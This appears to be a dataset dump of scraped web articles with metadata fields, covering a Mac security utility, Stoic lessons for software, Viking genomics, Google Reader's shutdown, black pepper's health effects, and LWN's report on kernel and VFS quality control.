`◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉`
- Make sure the Google Home device, the virtual device and your workstation are on the same network.
- Make sure to disable any firewall running on your workstation.
```
npm test --prefix app/
npm run lint --prefix device/
```
See `LICENSE` | true | true | true | Local Home SDK sample. Contribute to google-home/smart-home-local development by creating an account on GitHub. | 2024-10-12 00:00:00 | 2019-07-08 00:00:00 | https://opengraph.githubassets.com/96f47d0fddcd5804dcb600fc2c7bf6c88ee653cdc42c1135670b3bf6b8cc0cbd/google-home/smart-home-local | object | github.com | GitHub | null | null |
37,456,058 | https://eclecticlight.co/2023/09/08/inside-silentknight-how-it-works/ | Inside SilentKnight: how it works | Hoakley | SilentKnight is intended to:
- check that your Mac has the current firmware,
- check that its security protection is current and hasn’t fallen behind,
- screen for major security issues, and warn you of them,
- make it easier to keep your Mac’s security data up to date.
This article explains how it does those.
**Opening checks**
When you first open the app, it may check whether it’s the current version by looking that up on my GitHub page. It only does this once a day, and if you prefer you can disable that in Settings.
It then starts checking the information to be displayed in its window. This involves inspecting version numbers of installed security data, fetching information from macOS, and checking its own records in its preference file as to when updates were last installed. To see whether versions are current, it accesses two files on my GitHub: one lists the current version numbers of security data and other files, the other contains firmware versions for different models of Mac.
If your Mac is running Catalina or later, the app also checks its log to obtain all scan reports from XProtect Remediator (XPR) in the last 24 hours, using the predicate
`/usr/bin/log show --predicate 'subsystem == "com.apple.XProtectFramework.PluginAPI" AND category == "XPEvent.structured"' --info --last 1d`
You can disable that check if you wish.
At the same time, SilentKnight uses the `softwareupdate`
command tool to check whether any updates are available from Apple for that Mac, another feature you can disable if you wish. The command it uses is
`softwareupdate -l --include-config-data`
All this information is assembled in the app’s window for you to see. If there are updates available, the app will normally display its button to **Install All Updates**, another behaviour you can change in its Settings, as explained at the end.
**Updates**
This is an example taken from an Intel MacBook Pro that hadn’t been used for some weeks, and had fallen behind with its updates. Settings used are the standard, with **Download and install** and the **Install All Updates** checkbox ticked.
This shows both XProtect and XPR are out of date and need to be updated, and there were no XPR scans in the last 24 hours, as the Mac was shut down for the whole of that time.
Available updates include a mixture of two security updates, that will bring XProtect and XPR up to date, and two large macOS updates, either to macOS 12.6.1 or 13.0. Although I was going to upgrade this Mac to Ventura anyway, I’d much prefer to do that using Software Update with its progress bar and other aids. So what I wanted was to download and install just those two security updates. To do that, I opened the SilentKnight Updater window using the **Install Named Update…** command in the File menu, which lets me download and install each update individually.
Look carefully at each entry in the list of available updates, and they consist of a first line like
`* Label: XProtectPayloads_10_15-83`
followed by a line giving title, size, and other information including whether installing that update restarts your Mac.
To install a named update, select the name given after **Label**, here `XProtectPayloads_10_15-83`
, copy that, and paste it into the box labelled **Name of update** in the SilentKnight Updater window. Then click on the **Install Named Update** button, and SilentKnight will run a command like
`softwareupdate -i --include-config-data XProtectPayloads_10_15-83`
to download and install that named update. It then tells you what it has done, and here has successfully downloaded and installed that update. Repeat that with any other updates you want to download and install.
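For anyone who prefers to script this rather than copy labels by hand, the label lines are easy to pull out of the softwareupdate listing. This is a rough Node/TypeScript sketch based on the output format shown above, not SilentKnight's own code:

```typescript
import { execSync } from "node:child_process";

// List available updates, including the config-data (XProtect etc.) updates,
// and extract the Label names that `softwareupdate -i --include-config-data <label>` expects.
const listing = execSync("softwareupdate -l --include-config-data", { encoding: "utf8" });

const labels = listing
  .split("\n")
  .filter((line) => line.includes("* Label:"))
  .map((line) => line.split("* Label:")[1].trim());

console.log(labels); // e.g. [ "XProtectPayloads_10_15-83", ... ]
```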
Normally, when you use the **Install All Updates** button, once the updates are complete SilentKnight automatically checks the versions again so you can be confident that it has worked properly and your Mac really is up to date. Because I used **Install Named Update** instead, I need to run that check manually by clicking on the **Check** button at the top of SilentKnight’s window.
The two red Xes have now gone, as the updates worked. Because XPR scans aren’t checked a second time, that information hasn’t changed. The information in the **Latest updates installed** now shows the most recent updates, and the other updates are still listed as being available.
If I don’t want to install any more updates, all I have to do now is quit SilentKnight. When I next open it, it will go through exactly the same sequence of checks, and no doubt still report that updates to 12.6.1 and 13.0 are available if I want them. But that’s my choice, and when I did upgrade that Mac to Ventura, I used Software Update rather than SilentKnight.
#### Security checks
SilentKnight is designed to draw your attention to any potential problems in the settings that it checks. Those are most extensive on Apple silicon Macs, but still cover the essentials on Intel models, particularly those with a T2 chip.
Here they include whether:
- Platform Security is full, which is broken down by Secure Boot, System Integrity Protection (SIP), the Signed System Volume (SSV) and others in the text below. If your Mac is using a language other than English, you may need to refer to the text below, as SilentKnight may be unable to tell from the localised results whether Platform Security is full;
- XProtect/Gatekeeper checks are enabled;
- FileVault is turned on.
**Settings**
To open its Settings window, use that command in the app’s SilentKnight menu. You’ll then see four settings:
- at the top, a radio button to choose between options for checking and download behaviour,
- a checkbox to set whether the Install All Updates button is shown or hidden,
- a checkbox to set whether to check XPR scans in the log,
- a checkbox to set whether to check for updates to SilentKnight itself.
Here are its standard settings, which you should use by default as they make life simpler.
The radio button selects how you want SilentKnight to check for and handle Apple’s updates:
- **Don’t check** means that whenever you open the app it won’t check for Apple’s updates at all;
- **Download only** means that the app will check for updates with Apple, but when you choose to fetch them, they will only be downloaded and not installed. That allows you to choose which to install, but some of those downloaded updates may not install properly when obtained in this way. It adds to your work, and makes use more complicated, but it’s available if you prefer.
- **Download and install** means that when you click on the button to **Install All Updates**, SilentKnight will both download and install all available updates from Apple.
Note that SilentKnight *never* downloads or installs any updates automatically: you always have to tell it to do that by clicking on the button, or using a menu command. You remain in control.
It’s easy not to pay close attention to the list of updates available, and automatically click on the **Install All Updates** button. To help prevent you from doing that, you can set that button to be hidden by unchecking this checkbox. This doesn’t alter the behaviour set by the radio buttons, just determines whether that button is shown (ticked) or hidden (unchecked).
When you’ve made any changes in Settings that you want to stick, click on the **Set** button, then quit SilentKnight. Open it again, and open Settings to confirm that they’re set the way that you want. Although changing its settings doesn’t require quitting the app, that’s a good way to check that they should remain as you want them when you next use the app.
I hope this helps you get the most from SilentKnight. | true | true | true | How it checks whether your Mac’s firmware and security protection are current, and screens for major security issues. | 2024-10-12 00:00:00 | 2023-09-08 00:00:00 | article | eclecticlight.co | The Eclectic Light Company | null | null |
|
13,876,056 | https://spin.atomicobject.com/2017/03/14/stoic-wisdom-for-better-software/ | Ancient Stoic Wisdom for Writing Better Software | Jaime Lightfoot | My time at a software company has shown me how much focus there is on the new: new smartphone and laptop models, new revs, new development boards, new languages, and so on. But what about the old? I’m talking *really* old, like “two millennia before the Unix-Epoch” old.
The Stoic philosophers Zeno of Citium, Epictetus, and Seneca spoke at length about logic, control, and truth–all terms we discuss as programmers, but with very different meanings and applications. Still, Stoic works have lasted for thousands of years. What lessons do the ancient Greeks have for an industry with an obsession for the newest, latest thing?
## *Via Negativa* – The Negative Way
“All philosophy lies in two words, sustain and abstain.” –Epictetus
*Via Negativa* is a Latin phrase usually associated with Christian theology, but it also describes a tenet of Stoic philosophy. It means removing what is bad or unnecessary in order to focus on what is good. Um, duh.
This seems completely obvious, yet it’s difficult to implement. We often look to fix problems (physical, financial, interpersonal, software, etc.) by positive action: adding more systems, rules, tracking, effort, and to-dos. This adds complication and leads to bugs, burnout, and failed New Year’s resolutions, but it’s familiar to us. The idea of fixing or improving things by *taking away* is counterintuitive and foreign to us.
What *via negativa* offers us is simplicity. A real-life example of adding vs. taking way might look like treating a medical condition by adding medication (*via positiva*), rather than removing stressors, possible allergens, etc. (*via negativa*). Adding medication might be beneficial, but it also adds a host of potential side effects, as well as hard-to-predict interaction with other medications. Of course, this is a simplified example (and I’m not a doctor), but the idea still holds: Our bias toward positive action and *adding* things to fix problems can add unforeseen complexity and consequences. Sound familiar?
The idea of *via negativa* doesn’t mean “do nothing.” Instead, it means striving toward simplicity and asking, **“What can I take away?”** So, how does this apply to software?
More lines of code mean more bugs. Conversely, “No code is faster than no code,” as posited by software blog Coding Horror and others.
The idea of simplicity crops up all over the place in software. Loose coupling in systems, called “orthogonality” in *The Pragmatic Programmer*, reduces dependency between different parts of a system. A push for reduced complexity is also seen in ideas like the Single Responsibility Principle and Separation of Concerns. The Don’t Repeat Yourself (or DRY) principle teaches that you should avoid duplication of logic, and that “every piece of knowledge must have a single, unambiguous, authoritative representation within a system.”
Most of us know that simplicity is a good idea: “less is more,” “keep it simple, stupid,” etc. Simple isn’t easy, though, as we have to be cognizant of our tendency toward positive action and *more*.
## *Premeditatio Malorum* – Negative Visualization
### (Literally, “premeditation of evils”)
“Begin each day by telling yourself: Today I shall be meeting with interference, ingratitude, insolence, disloyalty, ill-will, and selfishness–all of them due to the offenders’ ignorance of what is good or evil.” –Marcus Aurelius
The Stoics regularly thought, **“What’s the worst that could happen?”** This ranges from a daily expectation of meeting commonplace difficulty and vice, to contemplating personal catastrophes, even meditating on one’s own death. While this isn’t the kind of attitude that gets you invited to parties, the point is to be prepared, rather than surprised, if–or, let’s be honest–when bad things happen.
“What is quite unlooked for is more crushing in its effect, and unexpectedness adds to the weight of a disaster. The fact that it was unforeseen has never failed to intensify a person’s grief. This is a reason for ensuring that nothing ever takes us by surprise. We should project our thoughts ahead of us at every turn and have in mind every possible eventuality instead of only the usual course of events.” –Seneca, *Letters from a Stoic*
To the Stoic philosopher Epictetus, such catastrophic events were “dispreferred indifferent,” meaning that it would be better if they didn’t happen, but if they did, well…it wouldn’t be the end of the world, and it wouldn’t overwhelm one’s strength of character.
This idea is also taught in Cognitive Behavior Therapy as “de-catastrophizing.” Imagining things going wrong allows you to feel these emotions in advance, which takes some of the sting away if (or when) something bad happens. This creates psychological resilience.
## Can We Get Back to Software, Please?
Phew, heavy stuff. While this might be a little too “Eeyore” for most of us, especially given the inherent optimism of most developers, preparing for the worst (and hoping for the best) is an attitude that acknowledges the realities of our job. Schedules change, bugs crop up at the most inopportune times, and so on.
To be responsible consultants, we have to continually ask ourselves, **“What’s the worst that could happen–and how do I prepare for it?”**
Test-driven development is a huge part of our culture at Atomic. We have to test the “happy path” in our code, but we also test a myriad of different ways that things could go wrong. This isn’t an afterthought–we need to imagine these scenarios at the beginning of development and design our systems to support this testing. Forcing yourself to imagine what could go wrong at the outset means that you can write your code in such a way to gracefully handle all (or almost all) that could go wrong.
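As a small, generic illustration of what testing the unhappy paths can look like (a sketch, not code from any Atomic Object project; the `parse_port` function is invented for the example), a pytest-style test might pair the happy case with the failure cases imagined up front:

```python
import pytest

def parse_port(value: str) -> int:
    """Parse a TCP port from user input, rejecting anything out of range."""
    port = int(value)  # raises ValueError for non-numeric input
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port

def test_happy_path():
    assert parse_port("8080") == 8080

def test_unhappy_paths():
    # The "what could go wrong" cases, considered at design time.
    with pytest.raises(ValueError):
        parse_port("not-a-number")
    with pytest.raises(ValueError):
        parse_port("70000")
```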
Likewise, we need a healthy dose of pessimism in our project planning. AO practices a “Fixed-Budget, Scope-Controlled” approach to working with clients. How do project and delivery leads account for hidden risks and things going wrong when estimating project scopes?
One estimation technique uses two scenarios, “highly probable” (HP) and “aggressive but possible” (ABP) to balance between an ABP best-case and more pessimistic HP view. Atomic also strives to have difficult conversations early. Our business relationships are built on trust, so it’s crucial for us to listen to those nagging doubts, and make sure that potential concerns are investigated, discussed with the customer in a helpful and timely way, and mitigated before they turn into crises.
## It’s All About Control
This brings us to the central idea of Stoicism: Understand what is in your control, what isn’t, and accept it. But don’t mistake this mindset for complacency.
Accepting that something is outside of your control doesn’t mean giving up. I might not like the weather, but I can’t change it. Denying the cold or rain won’t help me, but putting on some gloves or grabbing an umbrella will.
Of course, this is all easier said than done, and I’ve presented a fairly trivial “Hello World” example of accepting what is outside of our control. These Stoic ideas are difficult to implement, but they offer immense value in our day-to-day lives and in how we write software. So as we’re creating new software and gaining new knowledge, let’s not forget the old. | true | true | true | The idea of via negativa doesn’t mean “do nothing.” Instead, it means striving toward simplicity and asking, “What can I take away?” | 2024-10-12 00:00:00 | 2017-03-14 00:00:00 | article | atomicobject.com | Atomic Object | null | null |
|
24,506,724 | https://www.joh.cam.ac.uk/worlds-largest-ever-dna-sequencing-viking-skeletons-reveals-they-werent-all-scandinavian | World’s largest ever DNA sequencing of Viking skeletons reveals they weren’t all Scandinavian | null | ## World’s largest ever DNA sequencing of Viking skeletons reveals they weren’t all Scandinavian
#### “This study changes the perception of who a Viking actually was”
Invaders, pirates, warriors – the history books taught us that Vikings were brutal predators who travelled by sea from Scandinavia to pillage and raid their way across Europe and beyond.
Now cutting-edge DNA sequencing of more than 400 Viking skeletons from archaeological sites scattered across Europe and Greenland will rewrite the history books as it has shown:
- Skeletons from famous Viking burial sites in Scotland were actually local people who could have taken on Viking identities and were buried as Vikings.
- Many Vikings actually had brown hair, *not* blonde hair.
- Viking identity was not limited to people with Scandinavian genetic ancestry. The study shows the genetic history of Scandinavia was influenced by foreign genes from Asia and Southern Europe *before* the Viking Age.
- Early Viking Age raiding parties were an activity for locals and included close family members.
- The genetic legacy in the UK has left the population with up to six per cent Viking DNA.
The six-year research project, published in *Nature* today (16 September 2020), debunks the modern image of Vikings and was led by Professor Eske Willerslev, a Fellow of St John’s College, University of Cambridge, and director of The Lundbeck Foundation GeoGenetics Centre, University of Copenhagen.
He said: “We have this image of well-connected Vikings mixing with each other, trading and going on raiding parties to fight Kings across Europe because this is what we see on television and read in books – but genetically we have shown for the first time that it wasn’t that kind of world. This study changes the perception of who a Viking actually was – no one could have predicted these significant gene flows into Scandinavia from Southern Europe and Asia happened before and during the Viking Age.”
The word Viking comes from the Scandinavian term ‘vikingr’ meaning ‘pirate’. The Viking Age generally refers to the period from A.D. 800, a few years after the earliest recorded raid, until the 1050s, a few years before the Norman Conquest of England in 1066. The Vikings changed the political and genetic course of Europe and beyond: Cnut the Great became the King of England, Leif Eriksson is believed to have been the first European to reach North America – 500 years before Christopher Columbus - and Olaf Tryggvason is credited with taking Christianity to Norway. Many expeditions involved raiding monasteries and cities along the coastal settlements of Europe but the goal of trading goods like fur, tusks and seal fat were often the more pragmatic aim.
Professor Willerslev added: “We didn’t know genetically what they actually looked like until now. We found genetic differences between different Viking populations within Scandinavia which shows Viking groups in the region were far more isolated than previously believed. Our research even debunks the modern image of Vikings with blonde hair as many had brown hair and were influenced by genetic influx from the outside of Scandinavia.”
#### “Our research debunks the modern image of Vikings with blonde hair as many had brown hair and were influenced by genetic influx from the outside of Scandinavia”
The team of international academics sequenced the whole genomes of 442 mostly Viking Age men, women, children and babies from their teeth and petrous bones found in Viking cemeteries. They analysed the DNA from the remains from a boat burial in Estonia and discovered four Viking brothers died the same day. The scientists have also revealed male skeletons from a Viking burial site in Orkney, Scotland, were not actually genetically Vikings despite being buried with swords and other Viking memorabilia.
There wasn’t a word for Scandinavia during the Viking Age - that came later. But the research study shows that the Vikings from what is now Norway travelled to Ireland, Scotland, Iceland and Greenland. The Vikings from what is now Denmark travelled to England. And Vikings from what is now Sweden went to the Baltic countries on their all male ‘raiding parties’.
Dr Ashot Margaryan, Assistant Professor at the Section for Evolutionary Genomics, Globe Institute, University of Copenhagen and first author of the paper, said: “We carried out the largest ever DNA analysis of Viking remains to explore how they fit into the genetic picture of Ancient Europeans before the Viking Age. The results were startling and some answer long-standing historical questions and confirm previous assumptions that lacked evidence.
“We determined that a Viking raiding party expedition included close family members as we discovered four brothers in one boat burial in Estonia who died the same day. The rest of the occupants of the boat were genetically similar suggesting that they all likely came from a small town or village somewhere in Sweden.”
DNA from the Viking remains were shotgun sequenced from sites in Greenland, Ukraine, The United Kingdom, Scandinavia, Poland and Russia.
Professor Martin Sikora, a lead author of the paper and an Associate Professor at the Centre for GeoGenetics, University of Copenhagen, said: “We found that Vikings weren’t just Scandinavians in their genetic ancestry, as we analysed genetic influences in their DNA from Southern Europe and Asia which has never been contemplated before. Many Vikings have high levels of non-Scandinavian ancestry, both within and outside Scandinavia, which suggest ongoing gene flow across Europe.”
The team’s analysis also found that genetically Pictish people ‘became’ Vikings without genetically mixing with Scandinavians. The Picts were Celtic-speaking people who lived in what is today eastern and northern Scotland during the Late British Iron Age and Early Medieval periods.
Dr Daniel Lawson, lead author from The University of Bristol, explained: “Individuals with two genetically British parents who had Viking burials were found in Orkney and Norway. This is a different side of the cultural relationship from Viking raiding and pillaging.”
The Viking Age altered the political, cultural and demographic map of Europe in ways that are still evident today in place names, surnames and modern genetics.
Professor Søren Sindbæk, an archaeologist from Moesgaard Museum in Denmark who collaborated on the ground-breaking paper, explained: “Scandinavian diasporas established trade and settlement stretching from the American continent to the Asian steppe. They exported ideas, technologies, language, beliefs and practices and developed new socio-political structures. Importantly our results show that ‘Viking’ identity was not limited to people with Scandinavian genetic ancestry. Two Orkney skeletons who were buried with Viking swords in Viking style graves are genetically similar to present-day Irish and Scottish people and could be the earliest Pictish genomes ever studied.”
Assistant Professor Fernando Racimo, also a lead author based at the GeoGenetics Centre in the University of Copenhagen, stressed how valuable the dataset is for the study of the complex traits and natural selection in the past. He explained: “This is the first time we can take a detailed look at the evolution of variants under natural selection in the last 2,000 years of European history. The Viking genomes allow us to disentangle how selection unfolded before, during and after the Viking movements across Europe, affecting genes associated with important traits like immunity, pigmentation and metabolism. We can also begin to infer the physical appearance of ancient Vikings and compare them to Scandinavians today.”
The genetic legacy of the Viking Age lives on today with six per cent of people of the UK population predicted to have Viking DNA in their genes compared to 10 per cent in Sweden.
Professor Willerslev concluded: “The results change the perception of who a Viking actually was. The history books will need to be updated.”
**Published: 16/9/2020** | true | true | true | null | 2024-10-12 00:00:00 | 2020-09-16 00:00:00 | null | null | cam.ac.uk | joh.cam.ac.uk | null | null |
6,091,784 | http://www.buzzfeed.com/mattlynley/google-reader-died-because-no-one-would-run-it | Google Reader Died Because No One Would Run It | Matthew Lynley | There's a very simple corporate reason for why Google Reader was shut down earlier this month: No one internally deemed it important enough to even work on, much less save.
The decision had little to do with consumers — the RSS reader was very popular with a core set of power users — and much more to do with corporate politics. At Google, Chief Executive Larry Page and his inner circle of lieutenants, known as the "L Team," simply did not view Google Reader as an important strategic priority. Internally, it became obvious that despite Google Reader's loyal fan base, working on the project was not going to get the attention of Page, several sources close to the company told BuzzFeed.
While the company said Google Reader was shut down because of a decline in usage, a major reason for that was owed to the fact that the project lacked an engineering lead, in part because no one stepped up to the task and because Google leadership wasn't actively looking for one. Even when Google Reader was still public, without a leader it was functionally no longer a live project at Google, with engineers focusing more on Page's larger projects like Android, Chrome, Google Plus, and Search.
"We know Reader has a devoted following who will be very sad to see it go. We're sad too," Google software engineer Alan Green wrote in the farewell post for Google Reader. "There are two simple reasons for this: usage of Google Reader has declined, and as a company we're pouring all of our energy into fewer products. We think that kind of focus will make for a better user experience."
Google Reader began as an experiment under Google's "20% time" policy — which allows Google employees to devote 20% of their time to personal projects. It very quickly became extremely popular among a small subset of power users, but never reached the critical mass of Gmail or Android, for instance.
Google teams, like those at other tech companies, have product managers, but much of the company's leadership comes from its engineers. As a result, many product decisions come from and are executed by engineers, as was the case with Google Reader. Eventually, as Google Reader's importance declined internally, the engineering leads — the de facto leaders of the project — were moved onto more high-priority projects. (By the time Reader was shut down, the team didn't even have a product manager or full-time engineer, according to AllThingsD.)
There's been plenty of reading into whether the decision to shut down Google Reader means Google is trying to take over user data. There were also reports that privacy and compliance played into the decision as well. All of these probably played a part.
But the major factor is a bit simpler: No one wanted to devote the time and energy necessary to keep the project alive because it wasn't going to get them anywhere with Page. | true | true | true | <b>No one took ownership of Google Reader internally because it wasn't a top priority for Larry Page and his inner circle of lieutenants.</b> And if you aren't working on something that the boss cares about, then what's the point? | 2024-10-12 00:00:00 | 2013-07-23 00:00:00 | article | buzzfeednews.com | BuzzFeed News | null | null |
|
31,336,398 | https://theconversation.com/black-pepper-healthy-or-not-179815 | Black pepper: healthy or not? | Laura Brown | Everybody knows that consuming too much salt is bad for your health. But nobody ever mentions the potential impact of the other condiment in the cruet set: black pepper. Does it have an effect on your health?
Certainly, people through the ages have thought so. Black pepper, the dried berries of the *Piper nigrum* vine, has been part of traditional Indian (Ayurvedic) medicine for thousands of years. Ayurvedic practitioners believe that it has “carminative” properties – that is, it relieves flatulence. And in traditional Chinese medicine, black pepper is used to treat epilepsy.
Modern science suggests that black pepper does indeed confer health benefits, mainly as a result of an alkaloid called piperine – the chemical that gives pepper its pungent flavour, and a powerful antioxidant.
Antioxidants are molecules that mop up harmful substances called “free radicals”. An unhealthy diet, too much Sun exposure, alcohol and smoking can increase the number of free radicals in your body. An excess of these unstable molecules can damage cells, making people age faster and causing a range of health problems, including cardiovascular disease, cancer, arthritis, asthma and diabetes.
Laboratory studies in animals and in cells have shown that piperine counteracts these free radicals. In one study, rats were divided into several groups, with some rats fed a normal diet and other rats fed a high-fat diet. One group of rats was fed a high-fat diet supplemented with black pepper and another group of rats was fed a high-fat diet supplemented with piperine.
The rats fed a high-fat diet supplemented with black pepper or piperine had significantly fewer markers of free radical damage compared with rats just fed a high-fat diet. Indeed, their markers of free radical damage were comparable to rats fed a normal diet.
Piperine also has anti-inflammatory properties. Chronic inflammation is linked to a range of diseases, including autoimmune diseases, such as rheumatoid arthritis. Here again, animal studies have shown that piperine reduces inflammation and pain in rats with arthritis.
Black pepper can also help the body better absorb certain beneficial compounds, such as resveratrol – an antioxidant found in red wine, berries and peanuts. Studies suggest that resveratrol may protect against heart disease, cancer, Alzheimer’s and diabetes.
The problem with resveratrol, though, is that it tends to break apart before the gut can absorb it into the bloodstream. Black pepper, however, has been found to increase the “bioavailability” of resveratrol. In other words, more of it is available for the body to use.
Black pepper may also improve the absorption of curcumin, which is the active ingredient in the popular anti-inflammatory spice turmeric. Scientists found that consuming 20mg of piperine with 2g of curcumin improved the availability of curcumin in humans by 2,000%.
Other studies have shown that black pepper may improve the absorption of beta-carotene, a compound found in vegetables and fruits that your body converts into vitamin A. Beta-carotene functions as a powerful antioxidant that may fight against cellular damage. Research showed that consuming 15mg of beta-carotene with 5mg of piperine greatly increased blood levels of beta-carotene compared with taking beta-carotene alone.
## Piperine and cancer
Black pepper may also have cancer-fighting properties. Test-tube studies found that piperine reduced the reproduction of breast, prostate and colon cancer cells and encouraged cancer cells to die.
Researchers compared 55 compounds from a variety of spices and found that piperine was the most effective at increasing the effectiveness of a typical treatment for triple-negative breast cancer – the most aggressive type of cancer.
Piperine also shows promising effects in minimising multidrug resistance in cancer cells, which potentially reduces the effectiveness of chemotherapy.
A word of caution, though. All of these things are fairly uncertain, as most of the studies have been in cell cultures or animals. And these sorts of experiments don’t always “translate” to humans. However, you can be fairly certain that adding a few extra grinds of pepper to your food is unlikely to cause you harm – and may well be beneficial. | true | true | true | The king of spices has many health benefits – in rats, at least. | 2024-10-12 00:00:00 | 2022-04-08 00:00:00 | article | theconversation.com | The Conversation | null | null |
|
18,680,992 | https://lwn.net/SubscriberLink/774114/636f0ff05b24dc04/ | Kernel quality control, or the lack thereof | Jonathan Corbet December 7 | # Kernel quality control, or the lack thereof
Filesystem developers tend toward a high level of conservatism when it comes to making changes; given the consequences of mistakes, this seems like a healthy survival trait. One might rightly be tempted to regard a recent disagreement over the backporting of filesystem-related fixes to the stable kernels as an example of this conservatism, but there is more to it. The kernel development process has matured in many ways over the years; perhaps this discussion hints at some of the changes that will be needed to continue that maturation in the future.
While tracking down some problems with the XFS file cloning and
deduplication features (the `FICLONERANGE` and
`FIDEDUPERANGE` `ioctl()` calls in particular), the
developers noticed that, in fact, many aspects
of those interfaces did not work correctly. Resource limits were not
respected, users could overwrite a setuid file without resetting the setuid
bits, time stamps would not be updated, maximum file sizes would be
ignored, and more. Many of these problems were fixed in XFS itself, but
others affected all filesystems offering those features and needed to be
fixed at the virtual filesystem (VFS) level. The result was a series of
pull requests including this
one for 4.19-rc7, this
one for the 4.20 merge window, and
this
one for 4.20-rc4.
More recently, similar problems have been discovered with the
`copy_file_range()`
system call, resulting in this
patch set full of fixes. Once again, issues include the ability to
overwrite setuid files,
overwrite swap files, change immutable files, and overshoot resource
limits. Time stamps are not updated, overlapping copies are not caught,
and behavior between filesystems is inconsistent. Chinner's patch set
contains another set of changes,
almost all at the VFS level, to straighten these issues out.
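For readers who have not used the interface, the sketch below shows roughly what a user-space call to `copy_file_range()` looks like, here through Python's `os.copy_file_range()` wrapper (Linux, Python 3.8 or later). The paths are placeholders; it is the semantics around calls like this, such as setuid bits, time stamps, size limits and overlapping ranges, that the fixes straighten out.

```python
import os

# Copy the first 1 MiB of one file into another without bouncing the data
# through a user-space buffer; placeholder paths, Linux-only system call.
src = os.open("/tmp/source.dat", os.O_RDONLY)
dst = os.open("/tmp/dest.dat", os.O_WRONLY | os.O_CREAT, 0o644)
try:
    remaining = 1024 * 1024
    while remaining > 0:
        copied = os.copy_file_range(src, dst, remaining)
        if copied == 0:   # reached the end of the source file
            break
        remaining -= copied
finally:
    os.close(src)
    os.close(dst)
```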
#### Mainline quality assurance
The discovery of these bugs has brought a fair amount of disappointment with it. It seems clear that these new features were not extensively tested before being added to the kernel; certainly no automated tests had been added to the xfstests suite to verify them. Dave Chinner put it this way:
In time, these bugs will be fixed and users of all filesystems should benefit. Tests are being added to help ensure that these features continue to work in the future. This is clearly a necessary effort; Chinner and Darrick Wong are performing a service for the kernel community as a whole by taking it on. This work does raise a couple of interesting issues, though.
The first of those is the prospect of regressions in programs that have
come to depend on the behavior of these system calls as it is supported in
current kernels on specific filesystems. Hyrum's law suggests that such users
are likely to exist. Or, as Chinner put it: "the
API implementation is so broken right now that fixing it is almost
guaranteed to break something somewhere
". That could lead to some
interesting discussions if users start to complain that kernel updates have
broken their programs.
#### Stable updates
The other question that arises concerns the backporting of all these fixes to the stable kernel updates; indeed, it was the selection of one of the VFS fixes for backporting that set off the current conversation. The XFS developers have long been hostile to the automatic inclusion of their patches in stable updates, feeling that the work to validate those patches in older kernels has not been done and that the risk of creating new regressions is too high. As a result, XFS patches are not normally considered eligible for backporting, but that exclusion does not extend to fixes at the VFS layer.
In this case, Chinner stated that the current set of fixes has been validated for the mainline with a testing regime that runs billions of operations over a period of days; anything less risks not exposing some of the harder-to-hit bugs. Backporting those fixes to a different kernel would require the same level of testing to create the needed confidence that they don't create new problems, he said, and the XFS developers are too busy still fixing bugs to do that testing now.
Chinner followed
up with a lengthy indictment of the kernel development process as a
whole, saying that it is focused on speed and patch quantity rather than
the quality of the final result. The stable kernel process, in particular, is
"optimised to shovel as much change as possible with /as little
effort as possible/ back into older code bases
". He pointed out
that changes often appear in stable releases before they show up in a real
mainline release (as opposed to an -rc release), which doesn't leave a
whole lot of time for real stabilization. It is not, he feels, a small
problem:
Sasha Levin responded that the current process is the best that we can do at the moment:
For the time being, the VFS and XFS patches will not be included in the stable kernel updates. Once the fixes are complete and the filesystem test suites have been filled out, Wong said, it should be possible to safely backport the whole set. At that point, this particular issue will be solved, but that is not likely to happen until after the 4.21/5.0 kernel release.
For the longer term, there is still the problem that, as Wong put it:
"New features show up in the vfs without a lot of design
documentation, incomplete userspace interface manuals, and not much beyond
trivial testing
". One might well argue that this problem extends
beyond VFS features. The kernel community has never had much of a process
around the addition of APIs visible to user space; there are no real
requirements to ensure adequate documentation, testing, or consistency
between interfaces. The results can be seen in our released kernels, and
in the API mistakes that just barely escape release because the right
developer happened to notice them in time.
Over the years, the kernel community has matured considerably in a number
of ways. One need only look back to the days when we had no source-code
management system, no rules on regressions, and no release-management
discipline to see how much things have improved. The last few years have
seen some big improvements
around automated testing in particular. For all of our problems, the
quality of our
releases is quite a bit higher than it once was, even if it is not what it
should be. Given time, it is
reasonable to expect that we can build on that base to further focus our
processes on the quality of the kernels we release, if that is something
that the community decides it wants to do.
| Index entries for this article | |
| --- | --- |
| Kernel | Development model/Kernel quality |
| Kernel | System calls/copy_file_range() |
Posted Dec 7, 2018 19:21 UTC (Fri)
by
I always have to read these patch sets to make sure that when the above are features, they aren't getting removed.
There's a "if (!is_dedupe)" in the code, so it's all good.
Posted Dec 7, 2018 20:27 UTC (Fri)
by
Dare I predict 2020 will be the year when that day comes in the spirit of Jon predictions will soon be upon us ;)
Posted Dec 7, 2018 20:38 UTC (Fri)
by
Posted Dec 8, 2018 1:20 UTC (Sat)
by
Posted Dec 8, 2018 16:45 UTC (Sat)
by
Agreed 200%, this is the core issue:
> > We ended up here because we *trusted* that ...
Either tests already exist and it's just the matter of the extra mile to automate them and share their results.
Or there's no decent, repeatable and re-usable test coverage and new features should simply not be added until there is. "Thanks your patches looks great, now where are your tests results please?". Not exactly ground-breaking software engineering.
Exceptions could be tolerated for hardware-specific or pre-silicon drivers which require very specific test environments and for which vendors can only hurt themselves anyway. That clearly doesn't seem the case of XFS or the VFS.
Validation and automation have a lesser reputation than development and tend to attract less talent. One possible and extremely simple way to address this is to treat the *development* of tests and automation to the same open-source and code review standards.
Posted Dec 9, 2018 11:17 UTC (Sun)
by
Posted Dec 9, 2018 14:20 UTC (Sun)
by
Besides tests themselves, it helps a LOT to have some kind of test coverage report, just to remind you of which parts of the code are never touched by any of your current tests.
Do people publish such coverage reports for the kernel?
Posted Dec 10, 2018 9:49 UTC (Mon)
by
However I can pretty much say that the main problems I see are various corner cases that are rarely hit (i.e. mostly failures and error propagation) and drivers. My take on this is that there is no point in doing coverage analysis when the gaps we have are enormous and easy to spot. Just have a look at our backlog of missing coverage in LTP at the moment https://github.com/linux-test-project/ltp/labels/missing%..., and these are just scratching the surface with most obviously missing syscalls. We may try to proceed with the coverage analysis once we are out of work there, which will hopefully happen at some point.
